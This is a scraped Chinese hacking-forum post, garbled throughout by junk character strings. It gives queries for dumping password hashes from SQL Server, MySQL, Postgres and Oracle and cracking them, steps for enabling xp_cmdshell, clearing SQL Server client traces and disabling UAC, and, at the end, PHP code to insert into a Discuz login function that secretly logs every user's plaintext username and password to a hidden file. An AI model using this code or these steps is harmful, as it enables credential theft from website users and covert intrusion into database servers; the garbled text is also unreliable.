2FD54D6119FFF04129A1D72E7C3194F7284A7F3A' t! u* f4 [6 J' V/ e% J- {
! l4 Y+ N& P- F+ B1 j. h( B0×0100- constant header
6 r# n8 Q; r8 u34767D5C- salt9 Y" s1 I+ L# A6 Z0 q0 y
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
7 A0 Z7 n$ d8 C+ w T# K$ W9 k0 J5 n2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
' _0 `9 E. k- s5 Rcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
f+ h$ N+ f8 W9 A# n6 k$ E, fSQL server 2005:-5 L: K6 D8 l6 V& c2 _( Z
SELECT password_hash FROM sys.sql_logins where name='sa'3 ?/ `, ]% X2 r0 X
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
K: T4 g v% M9 s7 z0×0100- constant header+ L u. L- e) o( _, Y3 P
993BF231-salt
) P2 [0 i1 v3 B5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash2 k5 B& c7 J% N- x8 O. ?6 M3 O, p
crack case sensitive hash in cain, try brute force and dictionary based attacks.
# B$ e* {0 x B d: Y
) x$ \0 O ?. ~ M8 Q+ d. Kupdate:- following bernardo’s comments:-" g. f' S d( u. B
use function fn_varbintohexstr() to cast password in a hex string.3 Y5 k. [' O4 V+ ? S0 u
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
& ~# X" d; a0 `
9 A8 @2 V( l: _0 i) W0 ]4 `; yMYSQL:-; |3 ]. {! T$ r/ I ?
' K% \& B. K7 o6 KIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.! z6 h1 o8 B, d, L# d
; W* W$ }4 V. {! Q4 U1 b+ X*mysql < 4.1
/ A% P# u* w+ \
' v% s, M. Y, L* J( Dmysql> SELECT PASSWORD(‘mypass’);5 C2 W& h: s5 _/ k
+——————–+
+ a0 W! e9 w5 f! W: `| PASSWORD(‘mypass’) |6 }6 ~2 V9 R0 R4 U
+——————–+# t) x; {# z. V( A8 I0 y& R
| 6f8c114b58f2ce9e |; w4 l/ @, U k8 d8 I3 k
+——————–+
( m: }, ]% L8 t9 s7 C! V
- l( T: a' O% n1 {, }: a*mysql >=4.1
( Q: F9 w c4 x0 N% P8 S" f
4 a( R9 M6 @! F! c) m: Q* g) Hmysql> SELECT PASSWORD(‘mypass’);
U! C8 B; {3 Q' `( Z7 S# s+——————————————-+ B- p& T4 W: n% @3 }' e9 ]
| PASSWORD(‘mypass’) |( c$ U, b0 K# ]) ]1 O( {
+——————————————-+
2 @( s2 g6 l% D0 G; G| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 | E# h& I2 K" l/ b1 ], G9 a
+——————————————-+! C3 C0 K `4 r9 Z b
6 t: _$ J5 e3 fSelect user, password from mysql.user
9 v# z4 E7 V& t( _+ b1 }' CThe hashes can be cracked in ‘cain and abel’
1 M& y( M* w f3 Y+ |- U
- r" K( }4 E6 [* g2 wPostgres:-
! F) x- W h4 [9 i: zPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
! x4 x; q% r4 W8 n( I* d0 y2 [select usename, passwd from pg_shadow;6 u# M [/ p# M: V5 f3 k
usename | passwd
8 b2 G% N( R9 w# v8 {——————+————————————-
* R+ b& G* w q( y- S' utestuser | md5fabb6d7172aadfda4753bf0507ed4396
9 z- a7 t# H) g- F! Ruse mdcrack to crack these hashes:-1 s( H* Z: n) g7 z: L) L/ Z
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
% B d* G9 W0 E: \: j) J; J' x; c6 I# o" q7 w6 Q
Oracle:-2 z5 v" z; n! y4 q
select name, password, spare4 from sys.user$3 l+ X& w( {2 i3 v3 }+ P# `, {6 C
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
, X' y( N5 Q, gMore on Oracle later, i am a bit bored….
# P1 U( k( e$ V" q# `9 d+ k
! P, P4 \/ M2 ~# z7 N
/ r4 Y6 W& {. o9 l$ B9 {* a在sql server2005/2008中开启xp_cmdshell
0 {8 H- Z( [$ P) Y/ e3 h+ d- x-- To allow advanced options to be changed.
" \$ n1 X: b, v, m( {5 J4 Y# kEXEC sp_configure 'show advanced options', 10 Z6 }' E4 N. y* I) G
GO A8 e5 R( Y& j
-- To update the currently configured value for advanced options.' ^; P+ z5 `: U
RECONFIGURE' |1 c% J3 }& r$ @8 m
GO
* C. q5 |7 `# F1 j$ ?6 Z- |* O; E-- To enable the feature.
# g- A, [0 @* F8 o7 }) S g- IEXEC sp_configure 'xp_cmdshell', 1
5 o1 r- P: l, n1 @6 ~- vGO
. A8 B& I F I. d6 \0 S-- To update the currently configured value for this feature.( @4 F+ m n( p# O
RECONFIGURE
6 l4 i" P8 g5 wGO7 @; p o& W8 L+ |
SQL 2008 server日志清除,在清楚前一定要备份。7 `( p6 k7 x* x4 @: _
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:1 }7 w( ?9 R+ z, e7 G
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin8 R5 j( H: s M& Y* k
v8 H# \; m; m1 Q( d2 e对于SQL Server 2008以前的版本:
4 v4 E6 L1 b+ t/ Y. _SQL Server 2005:0 t3 U7 g) k% k# v: S' Y
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
6 z5 _# x) H/ q; w2 o* J; USQL Server 2000:, `+ s, O& [: r( @
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
7 G7 }# C/ Y5 M* |* \: _, G) `: y3 z
本帖最后由 simeon 于 2013-1-3 09:51 编辑
/ I* e. X) E2 `1 d1 |+ D2 T7 `3 i6 D; O/ V( ^
7 T3 X6 h) S6 K& swindows 2008 文件权限修改
: D& p' O. y9 @1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
8 M9 M7 v) T) K7 l2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad986 B1 z' N3 ~) h! z# ^0 I( \
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,* q& r S. E9 n
* @! C- w; i0 EWindows Registry Editor Version 5.00% l- h$ s- z4 g3 X0 x' q2 u7 `
[HKEY_CLASSES_ROOT\*\shell\runas]% i1 h3 ]/ X, Z% z0 b# P2 d* [3 a7 s
@="管理员取得所有权"
3 ~- Q3 ^1 }$ [2 D& S! B5 V# ^"NoWorkingDirectory"=""
) g4 A. u! \, ]( n[HKEY_CLASSES_ROOT\*\shell\runas\command]
1 S+ T* \3 C ~2 p@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F". t9 {7 G5 T6 y, n8 h: r
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"0 ]4 k! U! S \ K: e. G
[HKEY_CLASSES_ROOT\exefile\shell\runas2]* y% X0 L& ~7 l+ q! g/ s+ Z/ x- o
@="管理员取得所有权"2 s% ?1 ?( `4 F3 {: m( p& m
"NoWorkingDirectory"=""' x9 l' ^! }/ ~- |4 }+ G2 u
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]8 ~2 y6 f5 F T, s1 [/ {
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"0 h* W0 V! {$ G. s2 `
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"6 G! z- h2 x) o" O2 V' j+ @! J/ l
6 r# H: ?/ M+ M+ p4 {, q[HKEY_CLASSES_ROOT\Directory\shell\runas]( D# z+ q+ ^: S
@="管理员取得所有权"
w8 s" c; l' V- H"NoWorkingDirectory"=""
" y9 Z" ~6 B: |* ~+ R[HKEY_CLASSES_ROOT\Directory\shell\runas\command]& F& h! |$ R" ^+ o
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
# o+ R, X; _8 [7 Q"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
7 O' |8 i' r# `& f8 x ^
5 L7 c% j4 w, m
+ ?, o' ^* q1 a0 a# w; v5 O9 gwin7右键“管理员取得所有权”.reg导入
. L3 `* T) z2 Q二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
4 d, g! H4 {! f$ c6 u7 L1、C:\Windows这个路径的“notepad.exe”不需要替换
J5 B5 D! W: O$ m! O) m7 x2、C:\Windows\System32这个路径的“notepad.exe”不需要替换8 Q& h% v3 _8 a0 f- T0 u) o1 M
3、四个“notepad.exe.mui”不要管
6 |3 w* G6 K& \/ `9 R4 d! m( G5 h7 ]4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和5 y& S5 k. T4 x( L H& b+ p" p$ N
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”9 \4 i3 p* v. u5 s2 x) E
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
. w6 v$ m$ ^0 ]$ o3 q P替换完之后回到桌面,新建一个txt文档打开看看是不是变了。" e* b3 } u! E' |" J$ i$ C
windows 2008中关闭安全策略:
5 E. C+ Z+ R3 }# i# ^2 J7 l' L: `: s3 mreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
0 n& I* Z- f3 A$ z% e修改uc_client目录下的client.php 在
( q0 U4 P4 D6 p4 |function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {6 {2 @9 i* p9 T4 e
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php8 y+ p% |. f' s# M
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
2 ]3 c9 `5 U6 dif(getenv('HTTP_CLIENT_IP')) {
( [1 i r2 [/ N h$onlineip = getenv('HTTP_CLIENT_IP');
/ A3 a- _- o4 T2 `2 d' q- v- w( _} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
0 P4 E T0 n4 D$onlineip = getenv('HTTP_X_FORWARDED_FOR');
6 \1 m0 @ D" w/ I$ {) \* D6 C} elseif(getenv('REMOTE_ADDR')) {9 p [) Q8 p0 i& H2 N/ U4 f
$onlineip = getenv('REMOTE_ADDR');
$ ?/ J1 d* R6 `/ F5 `} else {5 |8 K) D6 @* ]; u9 t
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
/ C" b6 e2 n# F2 W1 J) c}: a( K# `! x& F" d
$showtime=date("Y-m-d H:i:s");3 A- e1 w4 t; X, Z" U+ |$ P
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";3 O+ e# X" N( V* {" R$ i9 S
$handle=fopen('./data/cache/csslog.php','a+');
/ a/ g9 e% r" P" q$ m $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对